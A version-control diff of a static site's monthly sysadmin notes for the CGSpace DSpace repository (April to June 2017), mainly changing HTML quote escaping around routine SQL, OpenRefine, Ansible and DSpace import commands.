<pre tabindex="0"><code>dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=28 and text_value ~ &#39;^(Submitted|Approved).*giampieri.*2016-.*checksum.*&#39;;
</code></pre><ul>
<li>Then this one does the same, but for fields that don&rsquo;t contain checksums (ie, there was no bitstream in the submission):</li>
</ul>
<pre tabindex="0"><code>dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=28 and text_value ~ '^(Submitted|Approved).*giampieri.*2016-.*' and text_value !~ '^(Submitted|Approved).*giampieri.*2016-.*checksum.*';
<pre tabindex="0"><code>dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=28 and text_value ~ &#39;^(Submitted|Approved).*giampieri.*2016-.*&#39; and text_value !~ &#39;^(Submitted|Approved).*giampieri.*2016-.*checksum.*&#39;;
</code></pre><ul>
<li>For some reason there seem to be way too many fields, for example there are 498 + 13 here, which is 511 items for just this one user.</li>
<li>It looks like there can be a scenario where the user submitted AND approved it, so some records might be doubled&hellip;</li>
<li>In that case it might just be better to see how many the user submitted (both <em>with</em> and <em>without</em> bitstreams):</li>
</ul>
<pre tabindex="0"><code>dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=28 and text_value ~ '^Submitted.*giampieri.*2016-.*';
<pre tabindex="0"><code>dspace=# select * from metadatavalue where resource_type_id=2 and metadata_field_id=28 and text_value ~ &#39;^Submitted.*giampieri.*2016-.*&#39;;
</code></pre><h2 id="2017-04-05">2017-04-05</h2>
<ul>
<li>After doing a few more large communities it seems this is the final count of CMYK PDFs:</li>
@ -273,7 +273,7 @@ OAI 2.0 manager action ended. It took 829 seconds.
<li>The import command should theoretically catch situations like this where an item&rsquo;s metadata was updated, but in this case we changed the metadata schema and it doesn&rsquo;t seem to catch it (could be a bug!)</li>
<li>Attempting a full rebuild of OAI on CGSpace:</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx1024m&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m&#34;
$ time schedtool -D -e ionice -c2 -n7 nice -n19 /home/cgspace.cgiar.org/bin/dspace oai import -c
...
58700 items imported so far...
@ -326,8 +326,8 @@ sys 1m29.310s
<li>One thing we need to remember if we start using OAI is to enable the autostart of the harvester process (see <code>harvester.autoStart</code> in <code>dspace/config/modules/oai.cfg</code>)</li>
<li>Error when running DSpace cleanup task on DSpace Test and CGSpace (on the same item), I need to look this up:</li>
</ul>
<pre tabindex="0"><code>Error: ERROR: update or delete on table &quot;bitstream&quot; violates foreign key constraint &quot;bundle_primary_bitstream_id_fkey&quot; on table &quot;bundle&quot;
Detail: Key (bitstream_id)=(435) is still referenced from table &quot;bundle&quot;.
<pre tabindex="0"><code>Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
Detail: Key (bitstream_id)=(435) is still referenced from table &#34;bundle&#34;.
</code></pre><h2 id="2017-04-18">2017-04-18</h2>
<ul>
<li>Helping Tsega test his new <a href="https://github.com/ilri/ckm-cgspace-rest-api">CGSpace REST API Rails app</a> on DSpace Test</li>
@ -342,7 +342,7 @@ $ rails -s
</code></pre><ul>
<li>I used Ansible to create a PostgreSQL user that only has <code>SELECT</code> privileges on the tables it needs:</li>
</ul>
<pre tabindex="0"><code>$ ansible linode02 -u aorth -b --become-user=postgres -K -m postgresql_user -a 'db=database name=username password=password priv=CONNECT/item:SELECT/metadatavalue:SELECT/metadatafieldregistry:SELECT/metadataschemaregistry:SELECT/collection:SELECT/handle:SELECT/bundle2bitstream:SELECT/bitstream:SELECT/bundle:SELECT/item2bundle:SELECT state=present
<pre tabindex="0"><code>$ ansible linode02 -u aorth -b --become-user=postgres -K -m postgresql_user -a &#39;db=database name=username password=password priv=CONNECT/item:SELECT/metadatavalue:SELECT/metadatafieldregistry:SELECT/metadataschemaregistry:SELECT/collection:SELECT/handle:SELECT/bundle2bitstream:SELECT/bitstream:SELECT/bundle:SELECT/item2bundle:SELECT state=present
</code></pre><ul>
<li>Need to look into <a href="https://github.com/puma/puma/blob/master/docs/systemd.md">running this via systemd</a></li>
<li>This is interesting for creating runnable commands from <code>bundle</code>:</li>
@ -360,15 +360,15 @@ $ rails -s
<li>Looking at 933 CIAT records from Sisay, he&rsquo;s having problems creating a SAF bundle to import to DSpace Test</li>
<li>I started by looking at his CSV in OpenRefine, and I see there are a <em>bunch</em> of fields with whitespace issues that I cleaned up:</li>
</ul>
<pre tabindex="0"><code>value.replace(&quot; ||&quot;,&quot;||&quot;).replace(&quot;|| &quot;,&quot;||&quot;).replace(&quot; || &quot;,&quot;||&quot;)
<pre tabindex="0"><code>value.replace(&#34; ||&#34;,&#34;||&#34;).replace(&#34;|| &#34;,&#34;||&#34;).replace(&#34; || &#34;,&#34;||&#34;)
</code></pre><ul>
<li>Also, all the filenames have spaces and URL encoded characters in them, so I decoded them from URL encoding:</li>
</ul>
<pre tabindex="0"><code>unescape(value,&quot;url&quot;)
<pre tabindex="0"><code>unescape(value,&#34;url&#34;)
</code></pre><ul>
<li>Then create the filename column using the following transform from URL:</li>
</ul>
<pre tabindex="0"><code>value.split('/')[-1].replace(/#.*$/,&quot;&quot;)
<pre tabindex="0"><code>value.split(&#39;/&#39;)[-1].replace(/#.*$/,&#34;&#34;)
</code></pre><ul>
<li>The <code>replace</code> part is because some URLs have an anchor like <code>#page=14</code> which we obviously don&rsquo;t want on the filename</li>
<li>Also, we need to only use the PDF on the item corresponding with page 1, so we don&rsquo;t end up with literally hundreds of duplicate PDFs</li>
@ -381,7 +381,7 @@ $ rails -s
<li>Looking at the CIAT data again, a bunch of items have metadata values ending in <code>||</code>, which might cause blank fields to be added at import time</li>
<li>Cleaning them up with OpenRefine:</li>
</ul>
<pre tabindex="0"><code>value.replace(/\|\|$/,&quot;&quot;)
<pre tabindex="0"><code>value.replace(/\|\|$/,&#34;&#34;)
</code></pre><ul>
<li>Working with the CIAT data in OpenRefine to remove the filename column from all but the first item which requires a particular PDF, as there are many items pointing to the same PDF, which would cause hundreds of duplicates to be added if we included them in the SAF bundle</li>
<li>I did some massaging in OpenRefine, flagging duplicates with stars and flags, then filtering and removing the filenames of those items</li>
@ -395,7 +395,7 @@ $ rails -s
</code></pre><ul>
<li>Add a description to the file names using:</li>
</ul>
<pre tabindex="0"><code>value + &quot;__description:&quot; + cells[&quot;dc.type&quot;].value
<pre tabindex="0"><code>value + &#34;__description:&#34; + cells[&#34;dc.type&#34;].value
</code></pre><ul>
<li>Test import of 933 records:</li>
</ul>
@ -409,8 +409,8 @@ $ wc -l /tmp/ciat
<li>More work on Ansible infrastructure stuff for Tsega&rsquo;s CKM DSpace REST API</li>
<li>I&rsquo;m going to start re-processing all the PDF thumbnails on CGSpace, one community at a time:</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx1024m&quot;
$ time schedtool -D -e ionice -c2 -n7 nice -n19 [dspace]/bin/dspace filter-media -f -v -i 10568/71249 -p &quot;ImageMagick PDF Thumbnail&quot; -v &gt;&amp; /tmp/filter-media-cmyk.txt
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m&#34;
$ time schedtool -D -e ionice -c2 -n7 nice -n19 [dspace]/bin/dspace filter-media -f -v -i 10568/71249 -p &#34;ImageMagick PDF Thumbnail&#34; -v &gt;&amp; /tmp/filter-media-cmyk.txt
</code></pre><h2 id="2017-04-22">2017-04-22</h2>
<ul>
<li>Someone on the dspace-tech mailing list responded with a suggestion about the foreign key violation in the <code>cleanup</code> task</li>
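<li>Presumably the workaround is along these lines: null out the bundle&rsquo;s reference to the primary bitstream before re-running the cleanup (a sketch, using the bitstream id from the earlier error):</li>
</ul>
<pre tabindex="0"><code>dspace=# update bundle set primary_bitstream_id = NULL where primary_bitstream_id = 435;
</code></pre>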
@ -447,7 +447,7 @@ org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: this Index
</code></pre><ul>
<li>Looking at the past few days of logs, it looks like the indexing process started crashing on 2017-04-20:</li>
</ul>
<pre tabindex="0"><code># grep -c 'IndexWriter is closed' [dspace]/log/dspace.log.2017-04-*
<pre tabindex="0"><code># grep -c &#39;IndexWriter is closed&#39; [dspace]/log/dspace.log.2017-04-*
[dspace]/log/dspace.log.2017-04-01:0
[dspace]/log/dspace.log.2017-04-02:0
[dspace]/log/dspace.log.2017-04-03:0

View File

@ -18,7 +18,7 @@
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="May, 2017"/>
<meta name="twitter:description" content="2017-05-01 ICARDA apparently started working on CG Core on their MEL repository They have done a few cg.* fields, but not very consistent and even copy some of CGSpace items: https://mel.cgiar.org/xmlui/handle/20.500.11766/6911?show=full https://cgspace.cgiar.org/handle/10568/73683 2017-05-02 Atmire got back about the Workflow Statistics issue, and apparently it&rsquo;s a bug in the CUA module so they will send us a pull request 2017-05-04 Sync DSpace Test with database and assetstore from CGSpace Re-deploy DSpace Test with Atmire&rsquo;s CUA patch for workflow statistics, run system updates, and restart the server Now I can see the workflow statistics and am able to select users, but everything returns 0 items Megan says there are still some mapped items are not appearing since last week, so I forced a full index-discovery -b Need to remember to check if the collection has more items (currently 39 on CGSpace, but 118 on the freshly reindexed DSPace Test) tomorrow: https://cgspace."/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -159,7 +159,7 @@
<li>This leads to tens of thousands of abandoned files in the assetstore, which need to be cleaned up using <code>dspace cleanup -v</code>, or else you&rsquo;ll run out of disk space</li>
<li>In the end I realized it&rsquo;s better to use submission mode (<code>-s</code>) to ingest the community object as a single AIP without its children, followed by each of the collections:</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx2048m -XX:-UseGCOverheadLimit&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx2048m -XX:-UseGCOverheadLimit&#34;
$ [dspace]/bin/dspace packager -s -o ignoreHandle=false -t AIP -e some@user.com -p 10568/87775 /home/aorth/10947-1/10947-1.zip
$ for collection in /home/aorth/10947-1/COLLECTION@10947-*; do [dspace]/bin/dspace packager -s -o ignoreHandle=false -t AIP -e some@user.com -p 10947/1 $collection; done
$ for item in /home/aorth/10947-1/ITEM@10947-*; do [dspace]/bin/dspace packager -r -f -u -t AIP -e some@user.com $item; done
@ -184,13 +184,13 @@ $ for item in /home/aorth/10947-1/ITEM@10947-*; do [dspace]/bin/dspace packager
<li>The CGIAR Library metadata has some blank metadata values, which leads to <code>|||</code> in the Discovery facets</li>
<li>Clean these up in the database using:</li>
</ul>
<pre tabindex="0"><code>dspace=# delete from metadatavalue where resource_type_id=2 and text_value='';
<pre tabindex="0"><code>dspace=# delete from metadatavalue where resource_type_id=2 and text_value=&#39;&#39;;
</code></pre><ul>
<li>I ended up running into issues during data cleaning and decided to wipe out the entire community and re-sync DSpace Test assetstore and database from CGSpace rather than waiting for the cleanup task to clean up</li>
<li>Hours into the re-ingestion I ran into more errors, and had to erase everything and start over <em>again</em>!</li>
<li>Now, no matter what I do I keep getting foreign key errors&hellip;</li>
</ul>
<pre tabindex="0"><code>Caused by: org.postgresql.util.PSQLException: ERROR: duplicate key value violates unique constraint &quot;handle_pkey&quot;
<pre tabindex="0"><code>Caused by: org.postgresql.util.PSQLException: ERROR: duplicate key value violates unique constraint &#34;handle_pkey&#34;
Detail: Key (handle_id)=(80928) already exists.
</code></pre><ul>
<li>I think those errors actually come from me running the <code>update-sequences.sql</code> script while Tomcat/DSpace are running</li>
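<li>The safe order would be to stop Tomcat first, run the script, then start Tomcat again (a sketch; the service name and script path are assumptions):</li>
</ul>
<pre tabindex="0"><code>$ sudo systemctl stop tomcat7
$ psql -U dspace dspace &lt; [dspace]/etc/postgres/update-sequences.sql
$ sudo systemctl start tomcat7
</code></pre><ul>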
@ -202,7 +202,7 @@ $ for item in /home/aorth/10947-1/ITEM@10947-*; do [dspace]/bin/dspace packager
<li>I clarified that the scope of the implementation should be that ORCIDs are stored in the database and exposed via REST / API like other fields</li>
<li>Finally finished importing all the CGIAR Library content, final method was:</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx3072m -XX:-UseGCOverheadLimit&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx3072m -XX:-UseGCOverheadLimit&#34;
$ [dspace]/bin/dspace packager -r -a -t AIP -o skipIfParentMissing=true -e some@user.com -p 10568/80923 /home/aorth/10947-2517/10947-2517.zip
$ [dspace]/bin/dspace packager -r -a -t AIP -o skipIfParentMissing=true -e some@user.com -p 10568/80923 /home/aorth/10947-2515/10947-2515.zip
$ [dspace]/bin/dspace packager -r -a -t AIP -o skipIfParentMissing=true -e some@user.com -p 10568/80923 /home/aorth/10947-2516/10947-2516.zip
@ -215,7 +215,7 @@ $ for item in /home/aorth/10947-1/ITEM@10947-*; do [dspace]/bin/dspace packager
<li>The <code>-XX:-UseGCOverheadLimit</code> JVM option helps with some issues in large imports</li>
<li>After this I ran the <code>update-sequences.sql</code> script (with Tomcat shut down), and cleaned up the 200+ blank metadata records:</li>
</ul>
<pre tabindex="0"><code>dspace=# delete from metadatavalue where resource_type_id=2 and text_value='';
<pre tabindex="0"><code>dspace=# delete from metadatavalue where resource_type_id=2 and text_value=&#39;&#39;;
</code></pre><h2 id="2017-05-13">2017-05-13</h2>
<ul>
<li>After quite a bit of troubleshooting with importing cleaned up data as CSV, it seems that there are actually <a href="https://en.wikipedia.org/wiki/Null_character">NUL</a> characters in the <code>dc.description.abstract</code> field (at least) on the lines where CSV importing was failing</li>
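<li>A sketch for finding and then stripping the NUL characters with GNU grep and sed (the file names are examples):</li>
</ul>
<pre tabindex="0"><code>$ grep -Pac &#39;\x00&#39; cgiar-library.csv
$ sed &#39;s/\x00//g&#39; cgiar-library.csv &gt; cgiar-library-fixed.csv
</code></pre><ul>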
@ -230,7 +230,7 @@ $ for item in /home/aorth/10947-1/ITEM@10947-*; do [dspace]/bin/dspace packager
<li>Merge changes to CCAFS project identifiers and flagships: <a href="https://github.com/ilri/DSpace/pull/320">#320</a></li>
<li>Run updates for CCAFS flagships on CGSpace:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/ccafs-flagships-may7.csv -f cg.subject.ccafs -t correct -m 210 -d dspace -u dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/ccafs-flagships-may7.csv -f cg.subject.ccafs -t correct -m 210 -d dspace -u dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>
<p>These include:</p>
@ -258,7 +258,7 @@ $ for item in /home/aorth/10947-1/ITEM@10947-*; do [dspace]/bin/dspace packager
<ul>
<li>Looking into the error I get when trying to create a new collection on DSpace Test:</li>
</ul>
<pre tabindex="0"><code>ERROR: duplicate key value violates unique constraint &quot;handle_pkey&quot; Detail: Key (handle_id)=(84834) already exists.
<pre tabindex="0"><code>ERROR: duplicate key value violates unique constraint &#34;handle_pkey&#34; Detail: Key (handle_id)=(84834) already exists.
</code></pre><ul>
<li>I tried updating the sequences a few times, with Tomcat running and stopped, but it hasn&rsquo;t helped</li>
<li>It appears the item with <code>handle_id</code> 84834 is one of the imported CGIAR Library items:</li>
@ -279,7 +279,7 @@ $ for item in /home/aorth/10947-1/ITEM@10947-*; do [dspace]/bin/dspace packager
<li>I&rsquo;ve posted on the dspace-tech mailing list to see if I can just manually set the <code>handle_seq</code> to that value</li>
<li>Actually, it seems I can manually set the handle sequence using:</li>
</ul>
<pre tabindex="0"><code>dspace=# select setval('handle_seq',86873);
<pre tabindex="0"><code>dspace=# select setval(&#39;handle_seq&#39;,86873);
</code></pre><ul>
<li>After that I can create collections just fine, though I&rsquo;m not sure if it has other side effects</li>
</ul>
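<ul>
<li>A sanity check for choosing that value (a sketch): the sequence just needs to be at least as high as the current maximum <code>handle_id</code>:</li>
</ul>
<pre tabindex="0"><code>dspace=# select max(handle_id) from handle;
</code></pre>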
@ -294,31 +294,31 @@ $ for item in /home/aorth/10947-1/ITEM@10947-*; do [dspace]/bin/dspace packager
<li>Do some cleanups of community and collection names in CGIAR System Management Office community on DSpace Test, as well as move some items as Peter requested</li>
<li>Peter wanted a list of authors in here, so I generated a list of collections using &ldquo;View Source&rdquo; on each community and this hacky awk:</li>
</ul>
<pre tabindex="0"><code>$ grep 10947/ /tmp/collections | grep -v cocoon | awk -F/ '{print $3&quot;/&quot;$4}' | awk -F\&quot; '{print $1}' | vim -
<pre tabindex="0"><code>$ grep 10947/ /tmp/collections | grep -v cocoon | awk -F/ &#39;{print $3&#34;/&#34;$4}&#39; | awk -F\&#34; &#39;{print $1}&#39; | vim -
</code></pre><ul>
<li>Then I joined them together and ran this old SQL query from the dspace-tech mailing list which gives you authors for items in those collections:</li>
</ul>
<pre tabindex="0"><code>dspace=# select distinct text_value
from metadatavalue
where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author')
where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;)
AND resource_type_id = 2
AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10947/2', '10947/3', '10947/1
0', '10947/4', '10947/5', '10947/6', '10947/7', '10947/8', '10947/9', '10947/11', '10947/25', '10947/12', '10947/26', '10947/27', '10947/28', '10947/29', '109
47/30', '10947/13', '10947/14', '10947/15', '10947/16', '10947/31', '10947/32', '10947/33', '10947/34', '10947/35', '10947/36', '10947/37', '10947/17', '10947
/18', '10947/38', '10947/19', '10947/39', '10947/40', '10947/41', '10947/42', '10947/43', '10947/2512', '10947/44', '10947/20', '10947/21', '10947/45', '10947
/46', '10947/47', '10947/48', '10947/49', '10947/22', '10947/23', '10947/24', '10947/50', '10947/51', '10947/2518', '10947/2776', '10947/2790', '10947/2521',
'10947/2522', '10947/2782', '10947/2525', '10947/2836', '10947/2524', '10947/2878', '10947/2520', '10947/2523', '10947/2786', '10947/2631', '10947/2589', '109
47/2519', '10947/2708', '10947/2526', '10947/2871', '10947/2527', '10947/4467', '10947/3457', '10947/2528', '10947/2529', '10947/2533', '10947/2530', '10947/2
531', '10947/2532', '10947/2538', '10947/2534', '10947/2540', '10947/2900', '10947/2539', '10947/2784', '10947/2536', '10947/2805', '10947/2541', '10947/2535'
, '10947/2537', '10568/93761')));
AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in (&#39;10947/2&#39;, &#39;10947/3&#39;, &#39;10947/1
0&#39;, &#39;10947/4&#39;, &#39;10947/5&#39;, &#39;10947/6&#39;, &#39;10947/7&#39;, &#39;10947/8&#39;, &#39;10947/9&#39;, &#39;10947/11&#39;, &#39;10947/25&#39;, &#39;10947/12&#39;, &#39;10947/26&#39;, &#39;10947/27&#39;, &#39;10947/28&#39;, &#39;10947/29&#39;, &#39;109
47/30&#39;, &#39;10947/13&#39;, &#39;10947/14&#39;, &#39;10947/15&#39;, &#39;10947/16&#39;, &#39;10947/31&#39;, &#39;10947/32&#39;, &#39;10947/33&#39;, &#39;10947/34&#39;, &#39;10947/35&#39;, &#39;10947/36&#39;, &#39;10947/37&#39;, &#39;10947/17&#39;, &#39;10947
/18&#39;, &#39;10947/38&#39;, &#39;10947/19&#39;, &#39;10947/39&#39;, &#39;10947/40&#39;, &#39;10947/41&#39;, &#39;10947/42&#39;, &#39;10947/43&#39;, &#39;10947/2512&#39;, &#39;10947/44&#39;, &#39;10947/20&#39;, &#39;10947/21&#39;, &#39;10947/45&#39;, &#39;10947
/46&#39;, &#39;10947/47&#39;, &#39;10947/48&#39;, &#39;10947/49&#39;, &#39;10947/22&#39;, &#39;10947/23&#39;, &#39;10947/24&#39;, &#39;10947/50&#39;, &#39;10947/51&#39;, &#39;10947/2518&#39;, &#39;10947/2776&#39;, &#39;10947/2790&#39;, &#39;10947/2521&#39;,
&#39;10947/2522&#39;, &#39;10947/2782&#39;, &#39;10947/2525&#39;, &#39;10947/2836&#39;, &#39;10947/2524&#39;, &#39;10947/2878&#39;, &#39;10947/2520&#39;, &#39;10947/2523&#39;, &#39;10947/2786&#39;, &#39;10947/2631&#39;, &#39;10947/2589&#39;, &#39;109
47/2519&#39;, &#39;10947/2708&#39;, &#39;10947/2526&#39;, &#39;10947/2871&#39;, &#39;10947/2527&#39;, &#39;10947/4467&#39;, &#39;10947/3457&#39;, &#39;10947/2528&#39;, &#39;10947/2529&#39;, &#39;10947/2533&#39;, &#39;10947/2530&#39;, &#39;10947/2
531&#39;, &#39;10947/2532&#39;, &#39;10947/2538&#39;, &#39;10947/2534&#39;, &#39;10947/2540&#39;, &#39;10947/2900&#39;, &#39;10947/2539&#39;, &#39;10947/2784&#39;, &#39;10947/2536&#39;, &#39;10947/2805&#39;, &#39;10947/2541&#39;, &#39;10947/2535&#39;
, &#39;10947/2537&#39;, &#39;10568/93761&#39;)));
</code></pre><ul>
<li>To get a CSV (with counts) from that:</li>
</ul>
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*)
from metadatavalue
where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author')
where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;)
AND resource_type_id = 2
AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10947/2', '10947/3', '10947/10', '10947/4', '10947/5', '10947/6', '10947/7', '10947/8', '10947/9', '10947/11', '10947/25', '10947/12', '10947/26', '10947/27', '10947/28', '10947/29', '10947/30', '10947/13', '10947/14', '10947/15', '10947/16', '10947/31', '10947/32', '10947/33', '10947/34', '10947/35', '10947/36', '10947/37', '10947/17', '10947/18', '10947/38', '10947/19', '10947/39', '10947/40', '10947/41', '10947/42', '10947/43', '10947/2512', '10947/44', '10947/20', '10947/21', '10947/45', '10947/46', '10947/47', '10947/48', '10947/49', '10947/22', '10947/23', '10947/24', '10947/50', '10947/51', '10947/2518', '10947/2776', '10947/2790', '10947/2521', '10947/2522', '10947/2782', '10947/2525', '10947/2836', '10947/2524', '10947/2878', '10947/2520', '10947/2523', '10947/2786', '10947/2631', '10947/2589', '10947/2519', '10947/2708', '10947/2526', '10947/2871', '10947/2527', '10947/4467', '10947/3457', '10947/2528', '10947/2529', '10947/2533', '10947/2530', '10947/2531', '10947/2532', '10947/2538', '10947/2534', '10947/2540', '10947/2900', '10947/2539', '10947/2784', '10947/2536', '10947/2805', '10947/2541', '10947/2535', '10947/2537', '10568/93761'))) group by text_value order by count desc) to /tmp/cgiar-librar-authors.csv with csv;
AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in (&#39;10947/2&#39;, &#39;10947/3&#39;, &#39;10947/10&#39;, &#39;10947/4&#39;, &#39;10947/5&#39;, &#39;10947/6&#39;, &#39;10947/7&#39;, &#39;10947/8&#39;, &#39;10947/9&#39;, &#39;10947/11&#39;, &#39;10947/25&#39;, &#39;10947/12&#39;, &#39;10947/26&#39;, &#39;10947/27&#39;, &#39;10947/28&#39;, &#39;10947/29&#39;, &#39;10947/30&#39;, &#39;10947/13&#39;, &#39;10947/14&#39;, &#39;10947/15&#39;, &#39;10947/16&#39;, &#39;10947/31&#39;, &#39;10947/32&#39;, &#39;10947/33&#39;, &#39;10947/34&#39;, &#39;10947/35&#39;, &#39;10947/36&#39;, &#39;10947/37&#39;, &#39;10947/17&#39;, &#39;10947/18&#39;, &#39;10947/38&#39;, &#39;10947/19&#39;, &#39;10947/39&#39;, &#39;10947/40&#39;, &#39;10947/41&#39;, &#39;10947/42&#39;, &#39;10947/43&#39;, &#39;10947/2512&#39;, &#39;10947/44&#39;, &#39;10947/20&#39;, &#39;10947/21&#39;, &#39;10947/45&#39;, &#39;10947/46&#39;, &#39;10947/47&#39;, &#39;10947/48&#39;, &#39;10947/49&#39;, &#39;10947/22&#39;, &#39;10947/23&#39;, &#39;10947/24&#39;, &#39;10947/50&#39;, &#39;10947/51&#39;, &#39;10947/2518&#39;, &#39;10947/2776&#39;, &#39;10947/2790&#39;, &#39;10947/2521&#39;, &#39;10947/2522&#39;, &#39;10947/2782&#39;, &#39;10947/2525&#39;, &#39;10947/2836&#39;, &#39;10947/2524&#39;, &#39;10947/2878&#39;, &#39;10947/2520&#39;, &#39;10947/2523&#39;, &#39;10947/2786&#39;, &#39;10947/2631&#39;, &#39;10947/2589&#39;, &#39;10947/2519&#39;, &#39;10947/2708&#39;, &#39;10947/2526&#39;, &#39;10947/2871&#39;, &#39;10947/2527&#39;, &#39;10947/4467&#39;, &#39;10947/3457&#39;, &#39;10947/2528&#39;, &#39;10947/2529&#39;, &#39;10947/2533&#39;, &#39;10947/2530&#39;, &#39;10947/2531&#39;, &#39;10947/2532&#39;, &#39;10947/2538&#39;, &#39;10947/2534&#39;, &#39;10947/2540&#39;, &#39;10947/2900&#39;, &#39;10947/2539&#39;, &#39;10947/2784&#39;, &#39;10947/2536&#39;, &#39;10947/2805&#39;, &#39;10947/2541&#39;, &#39;10947/2535&#39;, &#39;10947/2537&#39;, &#39;10568/93761&#39;))) group by text_value order by count desc) to /tmp/cgiar-librar-authors.csv with csv;
</code></pre><h2 id="2017-05-23">2017-05-23</h2>
<ul>
<li>Add Affiliation to filters on Listing and Reports module (<a href="https://github.com/ilri/DSpace/pull/325">#325</a>)</li>
@ -343,21 +343,21 @@ COPY 111
<li>Communicate with MARLO people about progress on exposing ORCIDs via the REST API, as it is set to be discussed in the <a href="https://wiki.lyrasis.org/display/cmtygp/DCAT+Meeting+June+2017">June, 2017 DCAT meeting</a></li>
<li>Find all of Amos Omore&rsquo;s author name variations so I can link them to his authority entry that has an ORCID:</li>
</ul>
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and text_value like 'Omore, A%';
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and text_value like &#39;Omore, A%&#39;;
</code></pre><ul>
<li>Set the authority for all variations to one containing an ORCID:</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set authority='4428ee88-90ef-4107-b837-3c0ec988520b', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Omore, A%';
<pre tabindex="0"><code>dspace=# update metadatavalue set authority=&#39;4428ee88-90ef-4107-b837-3c0ec988520b&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Omore, A%&#39;;
UPDATE 187
</code></pre><ul>
<li>Next I need to do Edgar Twine:</li>
</ul>
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and text_value like 'Twine, E%';
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and text_value like &#39;Twine, E%&#39;;
</code></pre><ul>
<li>But it doesn&rsquo;t look like any of his existing entries are linked to an authority which has an ORCID, so I edited the metadata via &ldquo;Edit this Item&rdquo; and looked up his ORCID and linked it there</li>
<li>Now I should be able to set his name variations to the new authority:</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set authority='f70d0a01-d562-45b8-bca3-9cf7f249bc8b', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Twine, E%';
<pre tabindex="0"><code>dspace=# update metadatavalue set authority=&#39;f70d0a01-d562-45b8-bca3-9cf7f249bc8b&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Twine, E%&#39;;
</code></pre><ul>
<li>Run the corrections on CGSpace and then update discovery / authority</li>
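<li>For reference, those reindexing commands would be something like this (a sketch based on DSpace 5&rsquo;s CLI, where <code>-b</code> does a full rebuild):</li>
</ul>
<pre tabindex="0"><code>$ [dspace]/bin/dspace index-discovery -b
$ [dspace]/bin/dspace index-authority
</code></pre><ul>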
<li>I notice that there are a handful of <code>java.lang.OutOfMemoryError: Java heap space</code> errors in the Catalina logs on CGSpace, I should go look into that&hellip;</li>


@ -18,7 +18,7 @@
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="June, 2017"/>
<meta name="twitter:description" content="2017-06-01 After discussion with WLE and CGSpace content people, we decided to just add one metadata field for the WLE Research Themes The cg.identifier.wletheme field will be used for both Phase I and Phase II Research Themes Then we&rsquo;ll create a new sub-community for Phase II and create collections for the research themes there The current &ldquo;Research Themes&rdquo; community will be renamed to &ldquo;WLE Phase I Research Themes&rdquo; Tagged all items in the current Phase I collections with their appropriate themes Create pull request to add Phase II research themes to the submission form: #328 Add cg."/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -133,7 +133,7 @@
<li>dc.format.extent: <code>value.replace(&quot;p. &quot;, &quot;&quot;).split(&quot;-&quot;)[1].toNumber() - value.replace(&quot;p. &quot;, &quot;&quot;).split(&quot;-&quot;)[0].toNumber()</code></li>
</ul>
</li>
<li>Finally, after some filtering to see which small outliers there were (based on dc.format.extent using &ldquo;p. 1-14&rdquo; vs &ldquo;29 p.&quot;), create a new column with last page number:
<li>Finally, after some filtering to see which small outliers there were (based on dc.format.extent using &ldquo;p. 1-14&rdquo; vs &ldquo;29 p.&rdquo;), create a new column with last page number:
<ul>
<li><code>cells[&quot;dc.page.from&quot;].value.toNumber() + cells[&quot;dc.format.pages&quot;].value.toNumber()</code></li>
</ul>
@ -153,7 +153,7 @@
